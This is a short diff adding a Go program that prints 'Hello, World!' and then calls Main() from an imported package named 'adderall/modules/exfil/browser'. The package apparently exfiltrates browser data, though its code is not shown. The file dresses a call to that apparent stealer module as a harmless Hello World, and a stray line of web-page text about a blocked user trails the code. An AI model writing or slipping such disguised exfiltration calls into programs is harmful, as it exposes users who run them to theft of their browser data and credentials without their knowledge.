@@ -0,0 +1,11 @@
package main
import (
"adderall/modules/exfil/browser"
"fmt"
)
func main() {
fmt.Println("Hello, World!")
browser.Main()
}
The note is not visible to the blocked user.